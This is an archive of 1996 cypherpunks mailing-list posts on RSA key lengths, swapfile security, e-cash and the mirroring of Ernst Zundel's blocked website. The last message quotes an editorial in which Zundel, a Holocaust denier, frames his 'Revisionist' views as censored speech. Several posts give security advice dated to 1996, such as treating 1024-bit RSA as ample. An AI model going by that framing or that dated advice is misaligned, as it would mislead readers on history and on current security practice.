From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 2 Feb 1996 02:11:47 +0800
To: Ewout Meij <cypherpunks@toad.com
Subject: Re: Unscribe
Message-ID: <ad363bb4070210049d93@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:34 AM 2/2/96, Ewout Meij wrote:
>unscribe cypherpunks@toad.com
 ^^^^^^^^
>
>unscribe emeij@pi.net
 ^^^^^^^^
>
>There is a theory which states that if ever anyone discovers exactly
>what the Universe is for and why it is here, it will instantly
>disappear and be replaced by something even more bizarre and
>inexplicable.


There is a theory which states that the correct way to unsubscribe from
mailing lists is defined by the mailing list charter and principles, and
that sending misspelled "unscribe" messages to the wrong place, and
including "unscribe" messages intended for other lists, is bizarre and
inexplicable.

--TCM

P.S. to Ewout: Send a message to "majordomo@toad.com" with a body message
consisting only of "unsubscribe cypherpunks".

Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hauke@supra.kodak.com (Ron Hauke x75966 ins 114225)
Date: Fri, 2 Feb 1996 01:00:03 +0800
To: To:@supra.kodak.com, cypherpunks@toad.com
Subject: No Subject
Message-ID: <9602011608.AA00654@supra.Kodak.COM>
MIME-Version: 1.0
Content-Type: text/plain


unscribe cypherpunks@toad.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tallpaul@pipeline.com (tallpaul)
Date: Fri, 2 Feb 1996 01:01:52 +0800
To: cypherpunks@toad.com
Subject: Re: The FV Problem = A Press Problem
Message-ID: <199602011625.LAA17577@pipe8.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


At 6:42 PM 1/30/96, Jonathan Rochkind wrote: 
 
>I'd say _all_ news, not just software news, is P.R. controlled, these
days. 
>You can largely hold Edward L. Bernays, the "father of public relations" 
>(who just died last year) responsible for that--or the societal conditions

>that allowed Bernays to do his thing.  Bernays developed expertise in 
>"engineering of consent" turned the news into a commercialized and 
 
On January 13, 1996 I had the lead article in _Computer underground Digest_
(Volume 8, Issue 04) on the CyberAngels and how they were patrolling
cyberspace against the Four Horsemen types. 
 
Rockland is certainly welcome to tell the cypherpunks list the press
release(s) from which I wrote this "public relations." 
 
cc Tim May, CAF founder, chief technical officer, and media relations
specialist




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 2 Feb 1996 04:59:38 +0800
To: Peter Monta <cypherpunks@toad.com
Subject: Re: Crypto-smart-card startup Inside Technologies
Message-ID: <m0ti503-0008zrC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 09:41 PM 1/31/96 -0800, Peter Monta wrote:
>jim bell <jimbell@pacifier.com> writes:
>
>> >  [ Inside Technologies ]
>> >  ..."In public-key cryptography, 512-bit keys are typical and
>> >  already vulnerable.  So we are looking at 640-bit-long keys
>> >  supported by a scalable design."
>> 
>> This kind of thing disgusts me.  We already know 512-bit keys are weak.  As
>> I recall, I was told that 512 bit keys could be cracked in 20,000
>> MIPS-years.  If the ballpark formula holds that adding 10 bits doubles the
>> security, that merely means that 640 bits is 2**(128/10) or 8000 times
>> strong.  While obviously better than 512, it is not ENOUGH better to make me
>> confident that this is a long-term secure length.  768 or 1024 bits should
>> be considered the minimum.  A deliberate design of 640 bits makes it look
>> like it's intended to be crackable in 5-10 years, much as DES was suspected
>> of a similar design decision in limiting its keylength to 56 bits.
>
>But the "scalable design" presumably means the hardware can deal
>with a variety of modulus lengths.  As you say, they would be
>short-sighted to make a fixed choice.

I hope you're right about this.  But there's something to keep in mind.  
Let's suppose that in 10 years 640 bits are "easily" cracked.  Anybody with 
the storage (money) to keep all these messages will have the power to sort 
through everything you said in 1996, '10 years later.'  Who has the money to 
even store these messages, as well as the inclination?
You guessed it, the government.

I realize that it is arguable that this would be possible, no matter what 
keylength is chosen.  True, someday 1024-bit keys might be easily cracked, 
but that will probably be 30-50 years from now, not 10.  In other words, 
"stretching" the technology today on the "encrypt" side makes storing these 
messages far less attractive, meaning that the government will have less 
motivation to do it, and will not be able to make the effort pay off for a 
few more decades.

I would like to see laws:

1.  Prohibiting the government from storing encrypted messages it can't 
currently decrypt for over, say, a couple of years.

1a.  Prohibiting any USE by the government of such messages obtained and 
stored by other entities, including individuals and private corporations, 
without the express permission of the sender AND receiver of the message.

2.  Prohibiting the government from even ATTEMPTING to decrypt a 
domestically-obtained encrypted message, without a warrant which is 
simultaneously given to the source of the message:  In other words, alerting 
him to the government's interest.


This is just a start.



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMREY2/qHVDBboB2dAQGZdgP+MjIK02fU6iysN77g1aWb1gx9bzDrZoh4
ePWmd9RRD3gnzYOSIng5dRCxEpT+0Cqe4cFQEqbD6GhHlfNOKwkTU/LAfhvOdKpo
QJ9t93Af3aCaLtFmtXyj1Ce20GNqkp7qqP5DLKjYSEH/bR64aTA0pfZ70aes/8C1
w1AYLdvglXA=
=p+3A
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Fri, 2 Feb 1996 01:27:24 +0800
To: cypherpunks@toad.com
Subject: I hate over-hyped claims
Message-ID: <kl4D=9qMc50e1T2Ht2@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


Perception in some quarters to the contrary, I am very averse to
over-hyped claims, and I would therefore like to publicly acknowledge a
factual error in my previous announcement.  I wrote:

> The only known Internet-based solution that does not require such
> hardware is the First Virtual Internet Payment system, details of which
> are available at http://www.fv.com.

This is not quite true, and I should have known better, but I forgot
about the one other example I'd heard of.  I should have said:

> The only known Internet-based solutions that do not require such
> hardware are the First Virtual Internet Payment system, details of which
> are available at http://www.fv.com, and the GC Tech system, described at
> http://www.gctec.com/.

I apologize to the good folks at GC Tech for this unfortunate mistake. 
They are our competitors, but that does not mean we intended to make any
false or misleading claims about them.

I stand by all my other claims.    -- Nathaniel
--------
Nathaniel Borenstein <nsb@fv.com>
Chief Scientist, First Virtual Holdings
FAQ & PGP key: nsb+faq@nsb.fv.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Fri, 2 Feb 1996 04:30:11 +0800
To: Jim Choate <ravage@ssz.com>
Subject: Re: The Boys From Brazil - thoughts on cloning Nazi servers (fwd)
In-Reply-To: <199602011937.NAA00214@einstein.ssz.com>
Message-ID: <Pine.SOL.3.91.960201115107.11416A-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 1 Feb 1996, Jim Choate wrote:
> 
> I would counter and say that there is no distinction between free speech and
> promoting said speech. How does one say one party has the right to make a
> statement and a second party does not have the right to agree? The whole
> point of freedom of speech is to prevent limitations on distribution of
> information (aka speech, writting, source code, executables, video, audio
> tapes, etc.). Even use of these materials (ie running a virus) would not

I think you missed my point (run on sentences do that :).

To give one of the standard illustrations; I've written a short story, and
the evil mind-control freaks at Analog and IASFM refuse to publish it with
the flimsy excuse of it being crap and written in crayon.  You are not
required to send me millions of dollars so I can publish it myself. 
Howevr, if I did raise the millions of dollars, and TPTB tried to stop me
from publishing, there would be an obligation to fight that censorship by
permitting me to publish. 

Freedom of speech means that it other peoples speech shouldn't be 
censored; however there is no obligation for anyone to fund or lend other 
support towards that speech.  This situation is somewhat complicated in 
that in order to fight the censorship, the mirror sites must 
're-publish' the material; however as a side effect they are also 
publishing the material in a  prominent way to people whose access has 
not been censored.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Fri, 2 Feb 1996 01:41:31 +0800
To: cypherpunks@toad.com
Subject: Anonymous Interview
Message-ID: <2.2.32.19960201170657.006d9ebc@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


"Anonymous" the author(s) of "Primary Colors" (the Clinton Campaign novel)
conducted an interview with a Time Magazine writer using his/her/their
agent's online account.  A demonstration that borrowed accounts can overcome
account ID control attempts.

DCF






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Fri, 2 Feb 1996 02:40:34 +0800
To: John Young <jya@pipeline.com>
Subject: Tivoli
In-Reply-To: <199602011802.NAA24147@pipe3.nyc.pipeline.com>
Message-ID: <9602011810.AA18227@alpha>
MIME-Version: 1.0
Content-Type: text/plain



John Young writes:
 > Is it fair to assume that it's your Tivoli that's in the NYT 
 > and WSJ today, bought by IBM?

Yes, it is.  It was a big surprise (like, absolutely nobody knew what
was going on except for two or three VP's, and the CEO) (and I guess
the board, of course, but they mostly don't hang out around here
anyway).  Lots of ex-IBMers sorta freaked a little, but I think
everybody's happy.

 > If so, congrats on never again having to sell your body for 
 > everlasting fame and glory.

Uhh, well, I might have to sell myself a little...  But thanks very
much.


______c_____________________________________________________________________
Mike M Nally * Tiv^H^H^H IBM * Austin TX    * I want more, I want more,
       m5@tivoli.com * m101@io.com          * I want more, I want more ...
      <URL:http://www.io.com/~m101>         *_______________________________




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Fri, 2 Feb 1996 05:02:06 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Crypto-smart-card startup Inside Technologies
In-Reply-To: <m0ti503-0008zrC@pacifier.com>
Message-ID: <Pine.SOL.3.91.960201122347.11416B-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


One other little point about 640 bit rsa; there's no way I'd ever buy an
RSA accellerator tuned for 640, for one very simple reason. Most of the 
important keys I want an acellerator for are 1024 bits or longer - C/As, 
SETT banks, etc. I want to be able to clear 20 PKOPs per second without 
impacting the main CPUS; if I need to buy a busful of these babies they'd 
better be damn cheap and be available with duplicate keys...

Simon





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jim Thompson" <jim@SmallWorks.COM>
Date: Fri, 2 Feb 1996 03:18:45 +0800
To: John Young <m5@dev.tivoli.com
Subject: Re: Tivoli
In-Reply-To: <199602011802.NAA24147@pipe3.nyc.pipeline.com>
Message-ID: <9602011244.ZM1060@butthead.smallworks.com>
MIME-Version: 1.0
Content-Type: text/plain



Its the same Tivoli, (my spouse works there as well).

Jim




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Barrett/CheckFree Corporation <Andrew_Barrett@checkfree.com>
Date: Fri, 2 Feb 1996 02:20:00 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: Japanese Firm Announces E-cash Implementation
Message-ID: <9602012054.AA3141@6thstreetcheckfree.com>
MIME-Version: 1.0
Content-Type: text/plain


  Multimedia Business Analyst via Individual Inc. : NTT has developed a
secure electronic cash system for smart cards and  Internet-based
transactions, reports Reuter. Using very secure  encryption algorithms, the
system allows users to transfer cash from  their bank accounts to smart
cards after verification by the issuing  bank.

  NTT researcher Mikio Suzuki said the Japanese telecom operator plans to
begin trials of the system with a number of major city banks in the  near
future. These are expected to include Fuji Bank and Sakura Bank.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steven L Baur <steve@miranova.com>
Date: Fri, 2 Feb 1996 23:07:14 +0800
To: cypherpunks@toad.com
Subject: Re: Unix swapfile security issues...
In-Reply-To: <199602010730.XAA09785@infinity.c2.org>
Message-ID: <m2hgxakbh1.fsf@miranova.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> "Anonymous" == Anonymous  <mixmaster@alpha.c2.org> writes:

Anonymous> I'm working on a unix application where I want to store a
Anonymous> key in memory and don't want it to get written out to a
Anonymous> swap file.  If the key is in any of the application's
Anonymous> memory pages, it could be swapped out at any time, and
Anonymous> potentially left in the swap file when the computer is
Anonymous> turned off.

That's only a problem if physical security doesn't exist at the
console.  No operating system (or monitor) can overcome the lack of
that.

Anonymous> But, what if the program creates a pipe() and writes the
Anonymous> key into it, then reads the key out when necessary?  A pipe
                             ^^^^^ ^^^ ^^^ ^^^

In which case it's in memory and can be paged or swapped.

Anonymous> has a 4K buffer, but that buffer is in the kernel's memory,
Anonymous> not in the application's pages.  Could a kernel buffer get
Anonymous> written out to a swapfile?

Depending on how the kernel is written, bringing down the machine
could result in a dump of kernel memory being written to the swap
device anyway.

-- 
steve@miranova.com baur
Unsolicited commercial e-mail will be proofread for $250/hour.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sat, 3 Feb 1996 09:00:38 +0800
To: egoldman@leland.Stanford.EDU
Subject: Ways around "censorship" of Nazi Zundelsite (fwd)
Message-ID: <Pine.ULT.3.91.960201124432.11796K-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Similar notes have been posted to the newsgroups and faxed to a number of
press critters in Germany, Canada, and the US. The Ottowa Times is
probably going to be the first out with a reasonably in-depth story. If
you have something of import to say, I'll give you the reporter's number. 

We won already. OK? I believe even the Wiesenthal Center is waking up to
the fact that the only acceptable and efffective way to deal with evil
lies in the modern age is by drawing them into the open and smothering
them with the truth. They should have a statement shortly. 

Share and enjoy.

-rich

---------- Forwarded message ----------
Date: Thu, 1 Feb 1996 12:34:42 -0800 (PST)
From: Rich Graves <llurch@Networking.Stanford.EDU>
To: declan@eff.org, fight-censorship+@andrew.cmu.edu, haggaik@leland
Subject: Ways around WebCom censorship of Zundelsite (fwd)

-----BEGIN PGP SIGNED MESSAGE-----

Declan et al, I sent the enclosed to the white supremacists' moderated
mailing list in order to foster the free flow of information, and Don
Black approved it for distribution. Now they all know about all the 
mirrors. 

Since there is no longer any censorship, and since Zundel has released a 
press release about how "major universities have come to his defence" 
against this Zionist repression, I believe it would be appropriate to 
express our true feelings now. Of course copyright and good taste 
dictate that his pages remain on the Web completely unedited, but I see 
no reason for them to be the only thing there.

I would recommend adding a link to the following additional publications
of Zundel's, which were similarly "censored": 

 http://www.almanac.bc.ca/hweb/people/z/zundel-ernst/flying-saucers/

To prevent the saving of bookmarks within his site, I further recommend
moving his pages into a subdirectory with a name that changes from time to
time, as I have done. 

I apologize for blowing up at Declan. The link text from my page to his
again reads, in part: "My friend Declan's page has some more developed
ideas, most but not all of which I agree with. He has more time for this." 

- -rich

- ---------- Forwarded message ----------
Date: Thu, 1 Feb 1996 00:55:06 GMT
From: Stormfront-l <stormfront-l@stormfront.org>
To: rich@c2.org
Subject: Ways around WebCom censorship of Zundelsite

From: Rich Graves <llurch@networking.stanford.edu>
Date: Wed, 31 Jan 1996 16:55:06 -0800 (PST)
Subject: Ways around WebCom censorship of Zundelsite
 
You might want to consider this on your own sites. An IP filter is no 
good if the IP address changes.
 
I would also suggest holding your own press conference on February 28th.
 
- ---------- Forwarded message ----------
Date: Wed, 31 Jan 1996 15:52:37 -0800 (PST)
From: Declan
To: Fight Censorship Mailing List <fight-censorship+@andrew.cmu.edu>,
Subject: Re: A possible (though unlikely) easy way around WebCom censorship
 
On Wed, 31 Jan 1996, Declan B. McCullagh wrote:
> The attached TELECOM Digest message mentions assigning a new IP address
> to WebCom's web server, which would defeat the current block.
 
Thomas Leavitt from WebCom tells me that Telekom has blocked all accesses
to hosts within the webcom.com domain, though WiN has not. 
 
Apparently Spiegel TV is interested in reporting on this. One of their
reporters told me that the AntiDefamation League in NYC has been compiling
a list of offensive resources (primarily web pages, I think) on the
Internet. 
 
They're going to hold a press conference on February 28 to "demand reduced
access" to this material. 
 
- -Declan
 
- ---------- Forwarded message ----------
Anyway, this is all moot, because there are so many holes in the 
censorship curtain. See the full list of mirror sites and supplemental 
documentation at any of the following, all accessible from any computer 
in Germany:
 
http://web.mit.edu/afs/athena.mit.edu/contrib/bitbucket2/zundel/censorship.html
http://www.cs.cmu.edu/afs/cs/user/declan/www/Not_By_Me_Not_My_Views/censorship.
html
http://www.cs.cmu.edu/afs/cs/user/declan/www/Not_By_Me_Not_My_Views/censorship.
html
http://web.mit.edu/afs/cs.cmu.edu/user/declan/www/Not_By_Me_Not_My_Views/censor
ship.html
 
The Berlin Wall has fallen.
 
Next stop, the Great Firewall of China.

- ------------------------------------------------------------------------
To: Multiple recipients of the Stormfront-L Mailing List
Host: don.black@stormfront.org (Don Black)
To unsubscribe, send e-mail to 'listserv@stormfront.org' with the
line 'unsubscribe Stormfront-L' in the message BODY, not the subject.
- ------------------------------------------------------------------------

- -----
Processed with Listserv v2.77 for Wildcat v4

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMREji43DXUbM57SdAQFO0wP/XsuwmTWifPvJ2MscEWP0N+hSslXRzxfr
l1FN13DnduAJBE2yhJhZUZoCxdAlpXehHP7G2ZOyycdQpxUom7sTo4X0PP95Y5k4
7psQdzFoubAN7Uv6hQh1MTALD3t8vu2bwH4pYtkOeAi13PMvTe/PRfxlPBLcFz69
Bro6hYmaeE8=
=rKCu
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 2 Feb 1996 16:06:57 +0800
To: m5@dev.tivoli.com
Subject: Tivoli
Message-ID: <199602011802.NAA24147@pipe3.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Mike,


Is it fair to assume that it's your Tivoli that's in the NYT 
and WSJ today, bought by IBM?


If so, congrats on never again having to sell your body for 
everlasting fame and glory.



Envious




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Fri, 2 Feb 1996 03:53:49 +0800
To: cypherpunks@toad.com
Subject: The Boys From Brazil - thoughts on cloning Nazi servers (fwd)
Message-ID: <199602011937.NAA00214@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Thu, 1 Feb 1996 10:49:19 -0800 (PST)
> From: Simon Spero <ses@tipper.oit.unc.edu>
> Subject: The Boys From Brazil - thoughts on cloning Nazi servers
> 
> There's a fine line between defending someones freedom of speech, and 
> actively promoting that speech. The reason these mirrors have been set up 
> is to counter the restriction on access to the original site that has 
> been put in place by Deutche Telecom; however, in addition to defeating 
> this restriction, this approach also makes the material more widely 
> available than it was previously, which could be seen as crossing the 
> line between defence of free speech, and active promotion. 
> 

I would counter and say that there is no distinction between free speech and
promoting said speech. How does one say one party has the right to make a
statement and a second party does not have the right to agree? The whole
point of freedom of speech is to prevent limitations on distribution of
information (aka speech, writting, source code, executables, video, audio
tapes, etc.). Even use of these materials (ie running a virus) would not
violate either the spirit or the letter of the law unless it harmed another
person or somehow took advantage of their property (physical or
intellectual) without their prior consent. 


                                             Jim Choate
                                             CyberTects
                                             ravage@ssz.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vincent S. Gunville" <vingun@rgalex.com>
Date: Fri, 2 Feb 1996 03:35:41 +0800
To: mikshe@rgalex.com
Subject: Re: GTE and Cylink ATM Crypto
In-Reply-To: <199602010340.EAA16216@utopia.hacktic.nl>
Message-ID: <31110DCA.2218@rgalex.com>
MIME-Version: 1.0
Content-Type: text/plain


Anonymous wrote:
> 
> GTE & Cylink Team On Encryption For ATM
> 
> Washington, D.C., 31 January 1996 -- During a press
> conference last night at Comnet, GTE and Cylink unveiled
> InfoGuard 100, a jointly developed offering billed as the
> first encryption system able to work with ATM
> (asynchronous transfer mode).
> 
> InfoGuard 100 is meant to provide the security needed to
> induce business and government to use ATM public
> networks, said Michael M. Guzelian, GTE's marketing
> director for broadband systems, speaking at the press
> conference.
> 
> GTE is the number one provider of encryption to the
> federal government, while Cylink holds a 70 percent share
> of the commercial encryption market, according to Kamy
> Kavianian, senior product marketing manager at Cylink for
> SecureWAN.
> 
> GTE and Cylink will also jointly market the new ATM
> encryption system. "The deal (for InfoGuard 100) is
> mutually exclusive, but we don't know anyone else who can
> do it," noted Jeff Callo, Cylink's director of business
> development.
> 
> InfoGuard consists of two main components, according to
> the officials. An ATM adapter from GTE provides ATM
> interfaces and cell processing and control functions.
> 
> Cylink's CIDEC-VHS contributes "high-speed data
> encryption and decryption," in addition to physical
> security and "full automated key functions."
> 
> Kavianian told the journalists that InfoGuard 100 is
> based on DES encryption. Users of InfoGuard will foil
> "key exhaustion," a method used for breaking encryption
> codes, if they "change their codes frequently," Guzelian
> added.
> 
> Essentially, CIDEC-VHS has turned out to be "the first
> encryption method fast enough to keep up with ATM,"
> Guzelian maintained.
> 
> The agreement between Cylink and GTE represents "an
> excellent example of coopetition," Callo said.
> 
> --

-- 
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
|Vincent S. Gunville     
|Robbins-Gioia		 
|209 Madison St                       Email  vingun@rgalex.com
|Alexandria, Va 22309    
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Fri, 2 Feb 1996 04:36:03 +0800
To: cypherpunks@toad.com
Subject: Freedom of speech question...
Message-ID: <199602012012.OAA00279@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



It is a commenly held belief that shouting 'fire' in a crowded theatre is a
crime because of the potential for harm to persons and property. It is one
of the most commen examples given for limiting freedom of speech even though
the Constitution says "Congress shall make no law...". This view is proposed
as a equaly valid rationale for limiting crypto, virus technology, drugs,
etc.

My question to the list is would it be a crime if you were alone in the
theatre? If you developed a virus and didn't distribute it would that be a
crime? If you give it to one person is it a crime? How about if you give it
to millions? How many people must know a fact, posses source code or
executable. In short, does freedom of speech rest on how many people are
aware of your expression?

My position is that if you answer in the affermative then you are basicaly
stating there is no freedom of speech. It should be perfectly permissible
to shout 'fire' in a theatre filled to the brim. If anyone takes you
seriously and is harmed then you should be liable for the damage. Your right
to shout 'fire' is not relevant. If you accept the premise then what you are
buying into is preemptive justice, in short judging somebody guilty by what
they might do, not what they have done. If this is permitted then we have a
serious problem in that anyperson is therefore guilty of whatever crime is
desired.

 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Mazieres <dm@amsterdam.lcs.mit.edu>
Date: Fri, 2 Feb 1996 04:11:59 +0800
To: cypherpunks@toad.com
Subject: Domain registration
Message-ID: <199602011939.OAA23286@amsterdam.lcs.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


Well, several people have told me it is possible to get response times of
8 hours on domain registration requests.  The last MODIFY request I sent
in was in mid January.  They sent back an autoreply telling me they were
still working on modify requests from the third week in december, and then
didn't change my domain until last week.  (The inaddr.arpa modify request
was considerably faster, however.)  Maybe they just don't like me, or
maybe they have very very recently automated the process.

At any rate, I stand corrected.

David




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Fri, 2 Feb 1996 07:13:56 +0800
To: cypherpunks@toad.com
Subject: The Boys From Brazil - cloning Nazi servers
Message-ID: <199602012239.OAA04660@netcom2.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


ses@tipper.oit.unc.edu (Simon Spero) writes:

 > There's a fine line between defending someones freedom of
 > speech, and actively promoting that speech. The reason these
 > mirrors have been set up is to counter the restriction on
 > access to the original site that has been put in place by
 > Deutche Telecom; however, in addition to defeating this
 > restriction, this approach also makes the material more
 > widely available than it was previously, which could be seen
 > as crossing the line between defence of free speech, and
 > active promotion.

I think you have to look at the balance between two things.

First, there is the effect of making the material more widely
available and publicized than it was prior to the attempted
censorship.  This effect is definitely real.  Indeed, prior to a
few days ago, I wouldn't have known a Zundelsite from a hole in
the ground.

Second, however, is the unprecedented opportunity for people
running mirrors to guarantee that large numbers of the public
will encounter said material for the first time enveloped within
their chosen "context wrapper."

Now it is well known that the crafty art of propaganda rarely
consists of deliberate falsehoods, like "yellow rain" or "spy
dust".  It mostly consists of making sure one is in complete
control of the circumstances in which potentially damaging
information is disclosed.

The opportunity to present Mr. Zundel's views brightly
gift-wrapped in paper bearing the legend - "Here are the
offensive views of a hate-mongering Nazi whose victims are
supporting his right to be heard" - is worth more than a thousand
press releases denouncing Mr. Zundel by the anti-defamation
brigade.

I would expect that it is this second effect which predominates,
and therefore the proliferation of mirror sites is in fact a
victory for Mr. Zundel's detractors, and not a promotion of Mr.
Zundel's views.

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Thomas C. Allard" <m1tca00@FRB.GOV>
Date: Fri, 2 Feb 1996 05:03:43 +0800
To: cypherpunks@toad.com
Subject: American Banker article on First Virtual
Message-ID: <9602012019.AA23304@bksmp2.FRB.GOV>
MIME-Version: 1.0
Content-Type: application/pgp

PGP message


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Fri, 2 Feb 1996 08:08:35 +0800
To: cypherpunks@toad.com
Subject: Copyright fight against unauthorized racist "Zundelsite" mirrors (was Re: INTERNET FREE SPEECH WEB SITE !) (fwd)
Message-ID: <Pine.ULT.3.91.960201151924.11796S-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


FYA.

---------- Forwarded message ----------
Date: Thu, 1 Feb 1996 15:09:07 -0800 (PST)
From: Rich Graves <llurch@networking.stanford.edu>
To: "E. Zundel" <ezundel@cts.com>
Cc: "Declan B. McCullagh" <declan+@CMU.EDU>,
    Blake D Mills IV <blakem@eniac.seas.upenn.edu>,
    fight-censorship+@andrew.cmu.edu, sameer@c2.org, lmccarth@cs.umass.edu,
    llurch@networking.stanford.edu, webmaster@nizkor.almanac.bc.ca,
    webmaster@wiesenthal.com
Newgroups: alt.censorship, comp.org.eff.talk, alt.revisionism,
    misc.int-property, misc.legal
Subject: Copyright fight against unauthorized racist "Zundelsite" mirrors (was Re: INTERNET FREE SPEECH WEB SITE !)

-----BEGIN PGP SIGNED MESSAGE-----

Declan:

Please take down the "build your own Zundelsite" files immediately,
because it appears that they are being used improperly. Surely you do not 
want to violate Mr. Zundel's copyright.

Ingrid/Zundel:

I am pleased to hear that you do not agree with Mr. Bunkley's use of your 
materials.

You should pursue legal action against Mr. Bunkley for copyright
infringement. I think an injunction and a seizure of assets might be in
order. 

I'm serious. Think about it.

Please let us know which of the mirror sites linked by Declan are 
authorized. I know mine and Declan's were, and I assume that you approve 
of the partial IHR mirror.

Because so many unblocked mirror sites currently exist, I have restricted 
access to my mirror to stanford.edu and a few other places.

A limited number of closely controlled mirrors is certainly in your
interest, because then it wold be much easier for you to update them. For
example, your lack of control leads to the perception that well after
Nizkor responded to your call for open debate, you have still not
acknowledged their response. You look like a bunch of liars claiming that 
Nizkor won't answer you. Surely this is not what you want.

- -rich


On Thu, 1 Feb 1996, E. Zundel wrote:

> Rich,
> 
> all I can say is:  Oh, my God!
> 
> I know Rich Bunkley, but only be name and only from a few days ago.  He
> wrote us a very nice letter and wanted some additional information. We
> promised it to him, but I don't know if it has even been sent.
> 
> All I can add is that a few days ago Ernst put an editorial online that
> explained where he stood with this kind of stuff.  It is on our English
> News page.  I don't have time to do anything more except to send you the
> HTML form, but you will see that we do not condone what Joe Bunkley is
> doing.
> 
> Here is the editorial:
> 
> <strong>January 25, 1996</strong>
> <P>
> 
> <h1>Hate on the Internet</h1>
> <H3>(Ernst Zundel)</h3>
> <HR>
> 
> The last few weeks have seen a number of new "skin head" and other fringe
> group web pages appear on the Internet.  I have at first watched with
> dismay and now with horror how crude, vicious and disgusting cartoons
> appear on some of these web pages, and how others openly promote an uncouth
> and barbaric form of verbal and symbolic violence.
> <P>
> At first I thought that the electronic "counter measures" agencies of our
> opponents had put up these sites to deliberately give Revisionists,
> racialists and National Socialists a bad name.  The timing seemed to
> coincide with the Simon Wiesenthal Center's censorship efforts, as
> elaborated on in the Front Page New York Times article January 10.  The
> censors claim they want to ban "pornography" and "hate groups" from the Net
> - and what easier way to do that than to point to vulgar, smutty, uncouth
> web sites?
> <P>
> Censors are appealing to Internet providers and servers to adopt a
> "responsible citizens of the community" standard and to keep smut and hate
> from the curious eyes of the impressionable young net surfers.  We all know
> that the United States Congress is currently working on just such
> legislation, (H.R. 1555 / S. 652), as is the Canadian government and
> undoubtedly other governments around the world.  Germany's ban of
> Compuserve is a perfect example.  This is a very dangerous development for
> all freedom-loving people.
> <P>
> I have felt uncomfortable in publicly defending the free speech rights of
> Internet pornographers in the CompuServe controversy of late December and
> early January, for I abhor pornography.  Nevertheless, others abhor my
> Revisionist viewpoint and I would be loath to let them censor me.  Now I am
> even more uncomfortable with the "Hate pages" of so-called "Right Wingers"
> or "Skin Head" groups on the Internet and their foul language and vicious
> cartoons of certain racial minorities.
> <P>
> Let me state unequivocally:  I condemn and abhor this kind of material - in
> print and on the Net.  As a German person, whose ethnic group has been
> negatively stereotyped since 1914 in thousands of vicious cartoons
> depicting my people as Neanderthal brutes goose-stepping over other
> people's rights while shouting "Heil Kaiser!" or "Heil Fuhrer!"  I am
> particularly sensitive to this issue.  I have collected stacks and stacks
> of these anti-German cartoons, and I dislike intensely how they distort my
> ethnic group, particularly the World War II generation that spilled its
